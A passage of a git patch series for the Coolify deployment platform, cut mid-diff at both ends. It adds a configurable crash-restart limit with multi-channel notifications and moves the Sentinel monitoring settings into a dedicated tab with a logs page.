+                        This behavior is normal for background workers, bots, or scheduled tasks.
+                        If your application needs to handle HTTP traffic, please specify the port(s) it listens on.
+                    </x-callout>
+                @endif
                 <div class="flex flex-col gap-2 xl:flex-row">
                     @if ($isStatic || $buildPack === 'static')
                         <x-forms.input id="portsExposes" label="Ports Exposes" readonly
@@ -502,7 +509,7 @@ class="flex items-start gap-2 p-4 mb-4 text-sm rounded-lg bg-blue-50 dark:bg-blu
                                 helper="Readonly labels are disabled. You can set the ports manually in the labels section."
                                 x-bind:disabled="!canUpdate" />
                         @else
-                            <x-forms.input placeholder="3000,3001" id="portsExposes" label="Ports Exposes" required
+                            <x-forms.input placeholder="3000,3001" id="portsExposes" label="Ports Exposes"
                                 helper="A comma separated list of ports your application uses. The first port will be used as default healthcheck port if nothing defined in the Healthcheck menu. Be sure to set this correctly."
                                 x-bind:disabled="!canUpdate" />
                         @endif

From 8c4865215b9ba90f0d37c7d2e81b351e8974001e Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Thu, 26 Mar 2026 13:26:50 +0530
Subject: [PATCH 03/90] feat(ui): show info callout only when domain is set
 without exposed ports

---
 resources/views/livewire/project/application/general.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php
index 9539f47dc..91e462b46 100644
--- a/resources/views/livewire/project/application/general.blade.php
+++ b/resources/views/livewire/project/application/general.blade.php
@@ -492,7 +492,7 @@ class="flex items-start gap-2 p-4 mb-4 text-sm rounded-lg bg-blue-50 dark:bg-blu
                         </div>
                     @endif
                 @endif
-                @if (empty($portsExposes) || $portsExposes === '0')
+                @if ((empty($portsExposes) || $portsExposes === '0') && !empty($fqdn))
                     <x-callout type="info" title="No ports exposed" class="mb-4">
                         This application does not expose any ports and will not be reachable through the proxy or your domains.
                         This behavior is normal for background workers, bots, or scheduled tasks.

From 886d01405f5da60c62e4fedd7d0c8d212caf1202 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 17:48:10 +0530
Subject: [PATCH 04/90] feat(applications): add configurable restart loop limit

---
 app/Actions/Docker/GetContainersStatus.php    |  17 +--
 app/Livewire/Project/Application/Advanced.php |  19 +++
 app/Models/Application.php                    |   1 +
 .../Application/RestartLimitReached.php       | 140 ++++++++++++++++++
 ...rt_count_to_applications_and_databases.php |  22 +++
 ...pplication-restart-limit-reached.blade.php |   7 +
 .../project/application/advanced.blade.php    |   8 +
 7 files changed, 204 insertions(+), 10 deletions(-)
 create mode 100644 app/Notifications/Application/RestartLimitReached.php
 create mode 100644 database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php
 create mode 100644 resources/views/emails/application-restart-limit-reached.blade.php

diff --git a/app/Actions/Docker/GetContainersStatus.php b/app/Actions/Docker/GetContainersStatus.php
index 5966876c6..cfac83583 100644
--- a/app/Actions/Docker/GetContainersStatus.php
+++ b/app/Actions/Docker/GetContainersStatus.php
@@ -2,6 +2,7 @@
 
 namespace App\Actions\Docker;
 
+use App\Actions\Application\StopApplication;
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
 use App\Actions\Shared\ComplexStatusCheck;
@@ -9,6 +10,7 @@
 use App\Models\ApplicationPreview;
 use App\Models\Server;
 use App\Models\ServiceDatabase;
+use App\Notifications\Application\RestartLimitReached as ApplicationRestartLimitReached;
 use App\Services\ContainerStatusAggregator;
 use App\Traits\CalculatesExcludedStatus;
 use Illuminate\Support\Arr;
@@ -475,16 +477,11 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti
                             'last_restart_type' => 'crash',
                         ]);
 
-                        // Send notification
-                        $containerName = $application->name;
-                        $projectUuid = data_get($application, 'environment.project.uuid');
-                        $environmentName = data_get($application, 'environment.name');
-                        $applicationUuid = data_get($application, 'uuid');
-
-                        if ($projectUuid && $applicationUuid && $environmentName) {
-                            $url = base_url().'/project/'.$projectUuid.'/'.$environmentName.'/application/'.$applicationUuid;
-                        } else {
-                            $url = null;
+                        // Check if restart limit has been reached
+                        $maxAllowedRestarts = $application->max_restart_count ?? 0;
+                        if ($maxAllowedRestarts > 0 && $maxRestartCount >= $maxAllowedRestarts && $previousRestartCount < $maxAllowedRestarts) {
+                            StopApplication::dispatch($application);
+                            $application->environment->project->team?->notify(new ApplicationRestartLimitReached($application));
                         }
                     }
 
diff --git a/app/Livewire/Project/Application/Advanced.php b/app/Livewire/Project/Application/Advanced.php
index cf7ef3e0b..9954c3422 100644
--- a/app/Livewire/Project/Application/Advanced.php
+++ b/app/Livewire/Project/Application/Advanced.php
@@ -82,6 +82,9 @@ class Advanced extends Component
     #[Validate(['boolean'])]
     public bool $isConnectToDockerNetworkEnabled = false;
 
+    #[Validate(['integer', 'min:0'])]
+    public int $maxRestartCount = 10;
+
     public function mount()
     {
         try {
@@ -144,6 +147,7 @@ public function syncData(bool $toModel = false)
             $this->disableBuildCache = $this->application->settings->disable_build_cache;
             $this->injectBuildArgsToDockerfile = $this->application->settings->inject_build_args_to_dockerfile ?? true;
             $this->includeSourceCommitInBuild = $this->application->settings->include_source_commit_in_build ?? false;
+            $this->maxRestartCount = $this->application->max_restart_count ?? 10;
         }
     }
 
@@ -252,6 +256,21 @@ public function saveCustomName()
         }
     }
 
+    public function saveMaxRestartCount()
+    {
+        try {
+            $this->authorize('update', $this->application);
+            $this->validate([
+                'maxRestartCount' => 'integer|min:0',
+            ]);
+            $this->application->max_restart_count = $this->maxRestartCount;
+            $this->application->save();
+            $this->dispatch('success', 'Max restart count saved.');
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
     public function render()
     {
         return view('livewire.project.application.advanced');
diff --git a/app/Models/Application.php b/app/Models/Application.php
index 4cc2dcf74..85a04041b 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -125,6 +125,7 @@ class Application extends BaseModel
     protected $casts = [
         'http_basic_auth_password' => 'encrypted',
         'restart_count' => 'integer',
+        'max_restart_count' => 'integer',
         'last_restart_at' => 'datetime',
     ];
 
diff --git a/app/Notifications/Application/RestartLimitReached.php b/app/Notifications/Application/RestartLimitReached.php
new file mode 100644
index 000000000..8709e7cd3
--- /dev/null
+++ b/app/Notifications/Application/RestartLimitReached.php
@@ -0,0 +1,140 @@
+<?php
+
+namespace App\Notifications\Application;
+
+use App\Models\Application;
+use App\Notifications\CustomEmailNotification;
+use App\Notifications\Dto\DiscordMessage;
+use App\Notifications\Dto\PushoverMessage;
+use App\Notifications\Dto\SlackMessage;
+use Illuminate\Notifications\Messages\MailMessage;
+
+class RestartLimitReached extends CustomEmailNotification
+{
+    public string $resource_name;
+
+    public string $project_uuid;
+
+    public string $environment_uuid;
+
+    public string $environment_name;
+
+    public ?string $resource_url = null;
+
+    public ?string $fqdn;
+
+    public int $restart_count;
+
+    public int $max_restart_count;
+
+    public function __construct(public Application $resource)
+    {
+        $this->onQueue('high');
+        $this->resource_name = data_get($resource, 'name');
+        $this->project_uuid = data_get($resource, 'environment.project.uuid');
+        $this->environment_uuid = data_get($resource, 'environment.uuid');
+        $this->environment_name = data_get($resource, 'environment.name');
+        $this->fqdn = data_get($resource, 'fqdn', null);
+        $this->restart_count = $resource->restart_count;
+        $this->max_restart_count = $resource->max_restart_count;
+        if (str($this->fqdn)->explode(',')->count() > 1) {
+            $this->fqdn = str($this->fqdn)->explode(',')->first();
+        }
+        $this->resource_url = base_url()."/project/{$this->project_uuid}/environment/{$this->environment_uuid}/application/{$this->resource->uuid}";
+    }
+
+    public function via(object $notifiable): array
+    {
+        return $notifiable->getEnabledChannels('status_change');
+    }
+
+    public function toMail(): MailMessage
+    {
+        $mail = new MailMessage;
+        $mail->subject("Coolify: {$this->resource_name} stopped - restart limit reached ({$this->restart_count}/{$this->max_restart_count})");
+        $mail->view('emails.application-restart-limit-reached', [
+            'name' => $this->resource_name,
+            'fqdn' => $this->fqdn,
+            'resource_url' => $this->resource_url,
+            'restart_count' => $this->restart_count,
+            'max_restart_count' => $this->max_restart_count,
+        ]);
+
+        return $mail;
+    }
+
+    public function toDiscord(): DiscordMessage
+    {
+        return new DiscordMessage(
+            title: ':warning: Restart limit reached',
+            description: "{$this->resource_name} has been stopped after {$this->restart_count} restarts (limit: {$this->max_restart_count}).\n\n[Open Application in Coolify]({$this->resource_url})",
+            color: DiscordMessage::errorColor(),
+            isCritical: true,
+        );
+    }
+
+    public function toTelegram(): array
+    {
+        $message = "Coolify: {$this->resource_name} has been stopped after {$this->restart_count} restarts (limit: {$this->max_restart_count}).";
+
+        return [
+            'message' => $message,
+            'buttons' => [
+                [
+                    'text' => 'Open Application in Coolify',
+                    'url' => $this->resource_url,
+                ],
+            ],
+        ];
+    }
+
+    public function toPushover(): PushoverMessage
+    {
+        $message = "{$this->resource_name} has been stopped after {$this->restart_count} restarts (limit: {$this->max_restart_count}).";
+
+        return new PushoverMessage(
+            title: 'Restart limit reached',
+            level: 'error',
+            message: $message,
+            buttons: [
+                [
+                    'text' => 'Open Application in Coolify',
+                    'url' => $this->resource_url,
+                ],
+            ],
+        );
+    }
+
+    public function toSlack(): SlackMessage
+    {
+        $title = 'Restart limit reached';
+        $description = "{$this->resource_name} has been stopped after {$this->restart_count} restarts (limit: {$this->max_restart_count})";
+
+        $description .= "\n\n*Project:* ".data_get($this->resource, 'environment.project.name');
+        $description .= "\n*Environment:* {$this->environment_name}";
+        $description .= "\n*Application URL:* {$this->resource_url}";
+
+        return new SlackMessage(
+            title: $title,
+            description: $description,
+            color: SlackMessage::errorColor()
+        );
+    }
+
+    public function toWebhook(): array
+    {
+        return [
+            'success' => false,
+            'message' => 'Restart limit reached',
+            'event' => 'restart_limit_reached',
+            'application_name' => $this->resource_name,
+            'application_uuid' => $this->resource->uuid,
+            'restart_count' => $this->restart_count,
+            'max_restart_count' => $this->max_restart_count,
+            'url' => $this->resource_url,
+            'project' => data_get($this->resource, 'environment.project.name'),
+            'environment' => $this->environment_name,
+            'fqdn' => $this->fqdn,
+        ];
+    }
+}
diff --git a/database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php b/database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php
new file mode 100644
index 000000000..578959c9a
--- /dev/null
+++ b/database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php
@@ -0,0 +1,22 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    public function up(): void
+    {
+        Schema::table('applications', function (Blueprint $blueprint) {
+            $blueprint->integer('max_restart_count')->default(10)->after('restart_count');
+        });
+    }
+
+    public function down(): void
+    {
+        Schema::table('applications', function (Blueprint $blueprint) {
+            $blueprint->dropColumn('max_restart_count');
+        });
+    }
+};
diff --git a/resources/views/emails/application-restart-limit-reached.blade.php b/resources/views/emails/application-restart-limit-reached.blade.php
new file mode 100644
index 000000000..e5fa01c00
--- /dev/null
+++ b/resources/views/emails/application-restart-limit-reached.blade.php
@@ -0,0 +1,7 @@
+<x-emails.layout>
+{{ $name }} has been automatically stopped after {{ $restart_count }} crash restarts (limit: {{ $max_restart_count }}).
+
+The application appears to be in a crash loop. Please investigate the issue and redeploy when ready.
+
+[Check what is going on]({{ $resource_url }}).
+</x-emails.layout>
diff --git a/resources/views/livewire/project/application/advanced.blade.php b/resources/views/livewire/project/application/advanced.blade.php
index 907500dfa..92020334b 100644
--- a/resources/views/livewire/project/application/advanced.blade.php
+++ b/resources/views/livewire/project/application/advanced.blade.php
@@ -75,6 +75,14 @@
                     helper="By default, you do not reach the Coolify defined networks.<br>Starting a docker compose based resource will have an internal network. <br>If you connect to a Coolify defined network, you maybe need to use different internal DNS names to connect to a resource.<br><br>For more information, check <a class='underline dark:text-white' target='_blank' href='https://coolify.io/docs/knowledge-base/docker/compose#connect-to-predefined-networks'>this</a>."
                     canGate="update" :canResource="$application" />
             @endif
+            <h3 class="pt-4">Restart Limit</h3>
+            <form class="flex items-end gap-2" wire:submit.prevent='saveMaxRestartCount'>
+                <x-forms.input type="number" min="0"
+                    helper="Maximum number of crash restarts before Coolify automatically stops the application and sends a notification. Set to 0 to disable the limit."
+                    id="maxRestartCount" label="Max Restart Count" canGate="update"
+                    :canResource="$application" />
+                <x-forms.button canGate="update" :canResource="$application" type="submit">Save</x-forms.button>
+            </form>
             <h3 class="pt-4">Logs</h3>
             <x-forms.checkbox helper="Drain logs to your configured log drain endpoint in your Server settings."
                 instantSave id="isLogDrainEnabled" label="Drain Logs" canGate="update" :canResource="$application" />

From 3d9c0b7b50c68efc03e277123dfacfc198237bd7 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 31 Mar 2026 11:35:49 +0530
Subject: [PATCH 05/90] refactor(migration): align migration name with actual
 schema change

---
 ...> 2026_03_27_000000_add_max_restart_count_to_applications.php} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename database/migrations/{2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php => 2026_03_27_000000_add_max_restart_count_to_applications.php} (100%)

diff --git a/database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php b/database/migrations/2026_03_27_000000_add_max_restart_count_to_applications.php
similarity index 100%
rename from database/migrations/2026_03_27_000000_add_max_restart_count_to_applications_and_databases.php
rename to database/migrations/2026_03_27_000000_add_max_restart_count_to_applications.php

From 6b1b1b14f295c73f4d90587809bb4b81ce6a3ddd Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Tue, 14 Apr 2026 18:50:01 +0530
Subject: [PATCH 06/90] feat(ui): move Sentinel to dedicated tab with sidebar
 navigation and logs page

---
 app/Livewire/Server/Charts.php                |  24 +++
 app/Livewire/Server/Sentinel.php              |  19 +-
 app/Livewire/Server/Sentinel/Logs.php         |  31 ++++
 app/Livewire/Server/Sentinel/Show.php         |  28 +++
 .../server/sidebar-sentinel.blade.php         |  10 ++
 .../views/components/server/sidebar.blade.php |   5 -
 .../views/livewire/server/charts.blade.php    |  25 ++-
 .../views/livewire/server/navbar.blade.php    |  26 ++-
 .../views/livewire/server/sentinel.blade.php  | 170 +++++++-----------
 .../livewire/server/sentinel/logs.blade.php   |  13 ++
 .../livewire/server/sentinel/show.blade.php   |  16 ++
 routes/web.php                                |   6 +-
 12 files changed, 242 insertions(+), 131 deletions(-)
 create mode 100644 app/Livewire/Server/Sentinel/Logs.php
 create mode 100644 app/Livewire/Server/Sentinel/Show.php
 create mode 100644 resources/views/components/server/sidebar-sentinel.blade.php
 create mode 100644 resources/views/livewire/server/sentinel/logs.blade.php
 create mode 100644 resources/views/livewire/server/sentinel/show.blade.php

diff --git a/app/Livewire/Server/Charts.php b/app/Livewire/Server/Charts.php
index d0db87f57..c09c11b60 100644
--- a/app/Livewire/Server/Charts.php
+++ b/app/Livewire/Server/Charts.php
@@ -2,11 +2,15 @@
 
 namespace App\Livewire\Server;
 
+use App\Actions\Server\StartSentinel;
 use App\Models\Server;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
 class Charts extends Component
 {
+    use AuthorizesRequests;
+
     public Server $server;
 
     public $chartId = 'server';
@@ -28,6 +32,26 @@ public function mount(string $server_uuid)
         }
     }
 
+    public function toggleMetrics()
+    {
+        try {
+            $this->authorize('update', $this->server);
+            $this->server->settings->is_metrics_enabled = ! $this->server->settings->is_metrics_enabled;
+            $this->server->settings->save();
+            $this->server->refresh();
+
+            if ($this->server->isMetricsEnabled()) {
+                StartSentinel::run($this->server, true);
+                $this->dispatch('success', 'Metrics enabled. Restarting Sentinel.');
+            } else {
+                $this->server->restartSentinel();
+                $this->dispatch('success', 'Metrics disabled. Restarting Sentinel.');
+            }
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
     public function pollData()
     {
         if ($this->poll || $this->interval <= 10) {
diff --git a/app/Livewire/Server/Sentinel.php b/app/Livewire/Server/Sentinel.php
index a4b35891b..f90af5a16 100644
--- a/app/Livewire/Server/Sentinel.php
+++ b/app/Livewire/Server/Sentinel.php
@@ -15,8 +15,6 @@ class Sentinel extends Component
 
     public Server $server;
 
-    public array $parameters = [];
-
     public bool $isMetricsEnabled;
 
     #[Validate(['required', 'string', 'max:500', 'regex:/\A[a-zA-Z0-9._\-+=\/]+\z/'])]
@@ -51,15 +49,9 @@ public function getListeners()
         ];
     }
 
-    public function mount(string $server_uuid)
+    public function mount()
     {
-        try {
-            $this->server = Server::ownedByCurrentTeam()->whereUuid($server_uuid)->firstOrFail();
-            $this->parameters = get_route_parameters();
-            $this->syncData();
-        } catch (\Throwable) {
-            return redirect()->route('server.index');
-        }
+        $this->syncData();
     }
 
     public function syncData(bool $toModel = false)
@@ -110,20 +102,21 @@ public function restartSentinel()
         }
     }
 
-    public function updatedIsSentinelEnabled($value)
+    public function toggleSentinel()
     {
         try {
             $this->authorize('manageSentinel', $this->server);
-            if ($value === true) {
+            if (! $this->isSentinelEnabled) {
                 if ($this->server->isBuildServer()) {
-                    $this->isSentinelEnabled = false;
                     $this->dispatch('error', 'Sentinel cannot be enabled on build servers.');
 
                     return;
                 }
+                $this->isSentinelEnabled = true;
                 $customImage = isDev() ? $this->sentinelCustomDockerImage : null;
                 StartSentinel::run($this->server, true, null, $customImage);
             } else {
+                $this->isSentinelEnabled = false;
                 $this->isMetricsEnabled = false;
                 $this->isSentinelDebugEnabled = false;
                 StopSentinel::dispatch($this->server);
diff --git a/app/Livewire/Server/Sentinel/Logs.php b/app/Livewire/Server/Sentinel/Logs.php
new file mode 100644
index 000000000..513776a6f
--- /dev/null
+++ b/app/Livewire/Server/Sentinel/Logs.php
@@ -0,0 +1,31 @@
+<?php
+
+namespace App\Livewire\Server\Sentinel;
+
+use App\Models\Server;
+use Livewire\Component;
+
+class Logs extends Component
+{
+    public ?Server $server = null;
+
+    public $parameters = [];
+
+    public function mount()
+    {
+        $this->parameters = get_route_parameters();
+        try {
+            $this->server = Server::ownedByCurrentTeam()->whereUuid(request()->server_uuid)->first();
+            if (is_null($this->server)) {
+                return redirect()->route('server.index');
+            }
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
+    public function render()
+    {
+        return view('livewire.server.sentinel.logs');
+    }
+}
diff --git a/app/Livewire/Server/Sentinel/Show.php b/app/Livewire/Server/Sentinel/Show.php
new file mode 100644
index 000000000..4bfc4c398
--- /dev/null
+++ b/app/Livewire/Server/Sentinel/Show.php
@@ -0,0 +1,28 @@
+<?php
+
+namespace App\Livewire\Server\Sentinel;
+
+use App\Models\Server;
+use Livewire\Component;
+
+class Show extends Component
+{
+    public ?Server $server = null;
+
+    public $parameters = [];
+
+    public function mount()
+    {
+        $this->parameters = get_route_parameters();
+        try {
+            $this->server = Server::ownedByCurrentTeam()->whereUuid(request()->server_uuid)->firstOrFail();
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
+    public function render()
+    {
+        return view('livewire.server.sentinel.show');
+    }
+}
diff --git a/resources/views/components/server/sidebar-sentinel.blade.php b/resources/views/components/server/sidebar-sentinel.blade.php
new file mode 100644
index 000000000..8249c9413
--- /dev/null
+++ b/resources/views/components/server/sidebar-sentinel.blade.php
@@ -0,0 +1,10 @@
+<div class="sub-menu-wrapper">
+    <a class="{{ request()->routeIs('server.sentinel') ? 'sub-menu-item menu-item-active' : 'sub-menu-item' }}" {{ wireNavigate() }}
+        href="{{ route('server.sentinel', $parameters) }}">
+        <span class="menu-item-label">Configuration</span>
+    </a>
+    <a class="{{ request()->routeIs('server.sentinel.logs') ? 'sub-menu-item menu-item-active' : 'sub-menu-item' }}"
+        href="{{ route('server.sentinel.logs', $parameters) }}">
+        <span class="menu-item-label">Logs</span>
+    </a>
+</div>
diff --git a/resources/views/components/server/sidebar.blade.php b/resources/views/components/server/sidebar.blade.php
index 2d7649fab..82ec985e3 100644
--- a/resources/views/components/server/sidebar.blade.php
+++ b/resources/views/components/server/sidebar.blade.php
@@ -6,11 +6,6 @@
             href="{{ route('server.advanced', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Advanced</span>
         </a>
     @endif
-    @if ($server->isFunctional() && !$server->isSwarm() && !$server->isBuildServer())
-        <a class="sub-menu-item {{ $activeMenu === 'sentinel' ? 'menu-item-active' : '' }}" {{ wireNavigate() }}
-            href="{{ route('server.sentinel', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Sentinel</span>
-        </a>
-    @endif
     <a class="sub-menu-item {{ $activeMenu === 'private-key' ? 'menu-item-active' : '' }}" {{ wireNavigate() }}
         href="{{ route('server.private-key', ['server_uuid' => $server->uuid]) }}"><span class="menu-item-label">Private Key</span>
     </a>
diff --git a/resources/views/livewire/server/charts.blade.php b/resources/views/livewire/server/charts.blade.php
index 51953ab9a..0acb79b93 100644
--- a/resources/views/livewire/server/charts.blade.php
+++ b/resources/views/livewire/server/charts.blade.php
@@ -6,7 +6,18 @@
     <div class="flex flex-col h-full gap-8 sm:flex-row">
         <x-server.sidebar :server="$server" activeMenu="metrics" />
         <div class="w-full">
-            <h2>Metrics</h2>
+            <div class="flex items-center gap-2">
+                <h2>Metrics</h2>
+                @if ($server->isMetricsEnabled())
+                    <x-forms.button canGate="update" :canResource="$server" wire:click='toggleMetrics'>
+                        Disable Metrics
+                    </x-forms.button>
+                @elseif ($server->isSentinelEnabled())
+                    <x-forms.button canGate="update" :canResource="$server" isHighlighted wire:click='toggleMetrics'>
+                        Enable Metrics
+                    </x-forms.button>
+                @endif
+            </div>
             <div class="pb-4">Basic metrics for your server.</div>
             @if ($server->isMetricsEnabled())
                 <div @if ($poll) wire:poll.5000ms='pollData' @endif x-init="$wire.loadData()">
@@ -288,8 +299,16 @@
                     </div>
                 </div>
             @else
-                <div>Metrics are disabled for this server. Enable them in <a class="underline dark:text-white"
-                        href="{{ route('server.show', ['server_uuid' => $server->uuid]) }}/sentinel" {{ wireNavigate() }}>Sentinel</a> settings.</div>
+                @if ($server->isSentinelEnabled())
+                    <x-callout type="info" title="Metrics Disabled">
+                        Metrics are disabled for this server. Click "Enable Metrics" above to start collecting metrics.
+                    </x-callout>
+                @else
+                    <x-callout type="info" title="Sentinel Required">
+                        Metrics require Sentinel to be enabled.
+                        Please <a class="underline font-semibold" href="{{ route('server.sentinel', ['server_uuid' => $server->uuid]) }}" {{ wireNavigate() }}>enable Sentinel</a> first.
+                    </x-callout>
+                @endif
             @endif
         </div>
     </div>
diff --git a/resources/views/livewire/server/navbar.blade.php b/resources/views/livewire/server/navbar.blade.php
index 4e53cd80e..bf55ca7f6 100644
--- a/resources/views/livewire/server/navbar.blade.php
+++ b/resources/views/livewire/server/navbar.blade.php
@@ -58,6 +58,17 @@ class="mx-1 dark:hover:fill-white fill-black dark:fill-warning">
                 </div>
             </div>
         @endif
+        @if ($server->isSentinelEnabled())
+            <div class="flex">
+                <div class="flex items-center">
+                    @if ($server->isSentinelLive())
+                        <x-status.running status="Sentinel In Sync" noLoading />
+                    @else
+                        <x-status.stopped status="Sentinel Out of Sync" noLoading />
+                    @endif
+                </div>
+            </div>
+        @endif
     </div>
     <div class="subtitle">{{ data_get($server, 'name') }}</div>
     <div class="navbar-main">
@@ -70,7 +81,7 @@ class="flex items-center gap-6 overflow-x-scroll sm:overflow-x-hidden scrollbar
             </a>
 
             @if (!$server->isSwarmWorker() && !$server->settings->is_build_server)
-                        <a class="{{ request()->routeIs('server.proxy') ? 'dark:text-white' : '' }} flex items-center gap-1" href="{{ route('server.proxy', [
+                        <a class="{{ request()->routeIs('server.proxy') || request()->routeIs('server.proxy.*') ? 'dark:text-white' : '' }} flex items-center gap-1" href="{{ route('server.proxy', [
                     'server_uuid' => data_get($server, 'uuid'),
                 ]) }}" {{ wireNavigate() }}>
                             Proxy
@@ -82,6 +93,19 @@ class="flex items-center gap-6 overflow-x-scroll sm:overflow-x-hidden scrollbar
                             @endif
                         </a>
             @endif
+            @if ($server->isFunctional() && !$server->isSwarm() && !$server->settings->is_build_server)
+                        <a class="{{ request()->routeIs('server.sentinel') || request()->routeIs('server.sentinel.*') ? 'dark:text-white' : '' }} flex items-center gap-1" href="{{ route('server.sentinel', [
+                    'server_uuid' => data_get($server, 'uuid'),
+                ]) }}" {{ wireNavigate() }}>
+                            Sentinel
+                            @if ($server->isSentinelEnabled() && !$server->isSentinelLive())
+                                <svg class="w-4 h-4 text-warning" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
+                                    <path fill="currentColor"
+                                        d="M236.8 188.09L149.35 36.22a24.76 24.76 0 0 0-42.7 0L19.2 188.09a23.51 23.51 0 0 0 0 23.72A24.35 24.35 0 0 0 40.55 224h174.9a24.35 24.35 0 0 0 21.33-12.19a23.51 23.51 0 0 0 .02-23.72m-13.87 15.71a8.5 8.5 0 0 1-7.48 4.2H40.55a8.5 8.5 0 0 1-7.48-4.2a7.59 7.59 0 0 1 0-7.72l87.45-151.87a8.75 8.75 0 0 1 15 0l87.45 151.87a7.59 7.59 0 0 1-.04 7.72M120 144v-40a8 8 0 0 1 16 0v40a8 8 0 0 1-16 0m20 36a12 12 0 1 1-12-12a12 12 0 0 1 12 12" />
+                                </svg>
+                            @endif
+                        </a>
+            @endif
             <a class="{{ request()->routeIs('server.resources') ? 'dark:text-white' : '' }}" href="{{ route('server.resources', [
     'server_uuid' => data_get($server, 'uuid'),
 ]) }}" {{ wireNavigate() }}>
diff --git a/resources/views/livewire/server/sentinel.blade.php b/resources/views/livewire/server/sentinel.blade.php
index 27a6d7eed..95e8c64e2 100644
--- a/resources/views/livewire/server/sentinel.blade.php
+++ b/resources/views/livewire/server/sentinel.blade.php
@@ -1,111 +1,67 @@
 <div>
-    <x-slot:title>
-        {{ data_get_str($server, 'name')->limit(10) }} > Sentinel | Coolify
-    </x-slot>
-    <livewire:server.navbar :server="$server" />
-    <div class="flex flex-col h-full gap-8 sm:flex-row">
-        <x-server.sidebar :server="$server" activeMenu="sentinel" />
-        <div class="w-full">
-            <form wire:submit.prevent='submit'>
-                <div class="flex gap-2 items-center pb-2">
-                    <h2>Sentinel</h2>
-                    <x-helper helper="Sentinel reports your server's & container's health and collects metrics." />
-                    @if ($server->isSentinelEnabled())
-                        <div class="flex gap-2 items-center">
-                            @if ($server->isSentinelLive())
-                                <x-status.running status="In sync" noLoading title="{{ $sentinelUpdatedAt }}" />
-                                <x-forms.button type="submit" canGate="update" :canResource="$server">Save</x-forms.button>
-                                <x-forms.button wire:click='restartSentinel' canGate="update" :canResource="$server">Restart</x-forms.button>
-                                <x-slide-over fullScreen>
-                                    <x-slot:title>Sentinel Logs</x-slot:title>
-                                    <x-slot:content>
-                                        <livewire:project.shared.get-logs :server="$server"
-                                            container="coolify-sentinel" displayName="Sentinel" :collapsible="false"
-                                            lazy />
-                                    </x-slot:content>
-                                    <x-forms.button @click="slideOverOpen=true">Logs</x-forms.button>
-                                </x-slide-over>
-                            @else
-                                <x-status.stopped status="Out of sync" noLoading
-                                    title="{{ $sentinelUpdatedAt }}" />
-                                <x-forms.button type="submit" canGate="update" :canResource="$server">Save</x-forms.button>
-                                <x-forms.button wire:click='restartSentinel' canGate="update" :canResource="$server">Sync</x-forms.button>
-                                <x-slide-over fullScreen>
-                                    <x-slot:title>Sentinel Logs</x-slot:title>
-                                    <x-slot:content>
-                                        <livewire:project.shared.get-logs :server="$server"
-                                            container="coolify-sentinel" displayName="Sentinel" :collapsible="false"
-                                            lazy />
-                                    </x-slot:content>
-                                    <x-forms.button @click="slideOverOpen=true">Logs</x-forms.button>
-                                </x-slide-over>
-                            @endif
-                        </div>
-                    @endif
+    <form wire:submit.prevent='submit'>
+        <div class="flex gap-2 items-center pb-2">
+            <h2>Sentinel</h2>
+            <x-helper helper="Sentinel reports your server's & container's health and collects metrics." />
+            @if (!$isSentinelEnabled)
+                <x-forms.button canGate="update" :canResource="$server" isHighlighted wire:click="toggleSentinel">Enable Sentinel</x-forms.button>
+            @else
+                <div class="flex gap-2 items-center">
+                    <x-forms.button type="submit" canGate="update" :canResource="$server">Save</x-forms.button>
+                    <x-forms.button wire:click='restartSentinel' canGate="update" :canResource="$server">
+                        {{ $server->isSentinelLive() ? 'Restart' : 'Sync' }}
+                    </x-forms.button>
+                    <x-forms.button canGate="update" :canResource="$server" wire:click="toggleSentinel">Disable Sentinel</x-forms.button>
                 </div>
-                <div class="flex flex-col gap-2">
-                    <div class="w-full sm:w-96">
-                        <x-forms.checkbox canGate="update" :canResource="$server" wire:model.live="isSentinelEnabled"
-                            label="Enable Sentinel" />
-                        @if ($server->isSentinelEnabled())
-                            @if (isDev())
-                                <x-forms.checkbox canGate="update" :canResource="$server" id="isSentinelDebugEnabled"
-                                    label="Enable Sentinel (with debug)" instantSave />
-                            @endif
-                            <x-forms.checkbox canGate="update" :canResource="$server" instantSave
-                                id="isMetricsEnabled" label="Enable Metrics" />
-                        @else
-                            @if (isDev())
-                                <x-forms.checkbox id="isSentinelDebugEnabled" label="Enable Sentinel (with debug)"
-                                    disabled instantSave />
-                            @endif
-                            <x-forms.checkbox instantSave disabled id="isMetricsEnabled"
-                                label="Enable Metrics (enable Sentinel first)" />
-                        @endif
-                    </div>
-                    @if (isDev() && $server->isSentinelEnabled())
-                        <div class="pt-4" x-data="{
-                            customImage: localStorage.getItem('sentinel_custom_docker_image_{{ $server->uuid }}') || '',
-                            saveCustomImage() {
-                                localStorage.setItem('sentinel_custom_docker_image_{{ $server->uuid }}', this.customImage);
